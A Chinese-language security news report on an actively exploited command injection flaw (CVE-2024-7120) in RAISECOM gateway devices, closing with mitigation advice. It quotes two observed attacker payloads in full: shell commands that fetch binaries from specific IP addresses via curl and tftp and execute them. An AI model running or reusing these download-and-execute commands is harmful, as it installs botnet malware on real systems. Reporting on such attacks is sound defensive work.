RAISECOM 网关中的严重漏洞被积极利用，数千人面临远程攻击

在 RAISECOM 网关设备中新发现并积极利用的漏洞对企业安全构成重大威胁。该漏洞被跟踪为 CVE-2024-7120，关键 CVSS 评分为 9.8，允许远程攻击者在受影响的设备上执行任意命令，可能导致未经授权的访问、数据泄露和系统受损。

命令注入漏洞存在于 Web 界面的 list_base_config.php 脚本中，影响运行软件版本 3.90 的 RAISECOM Gateway 型号 MSG1200、MSG2100E、MSG2200 和 MSG2300。安全研究人员已经证实了它很容易被利用，并且概念验证代码随时可用。

威胁行为者正在积极利用这一漏洞，自 9 月初以来就观察到了攻击，在 9 月 12 日至 13 日左右达到顶峰。

安全专家、研究院长 Johannes B. Ullrich 博士确定了攻击中使用的两种不同的有效载荷。这些旨在下载和执行恶意软件的有效负载显示了常规僵尸网络扫描和破坏易受攻击的路由器的证据。

第一个有效载荷：

 cd /tmp
rm -rf tplink
curl http://45.202.35.94/tplink --output tplink
chmod 777 tplink
./tplink

 cd /tmp
tftp -g -r ppc 141.98.11.136 69
chmod 777 ppc
./ppc raisee

虽然 RAISECOM 尚未发布补丁，但立即采取行动对于降低风险至关重要：

• 限制访问：将对设备 Web 界面的访问限制为仅受信任的网络和授权人员。
• 输入验证：在 Web 界面上实施严格的输入验证和清理程序，以防止恶意代码注入。
• 网络监控：采用强大的网络监控和入侵检测系统来识别和响应任何可疑活动。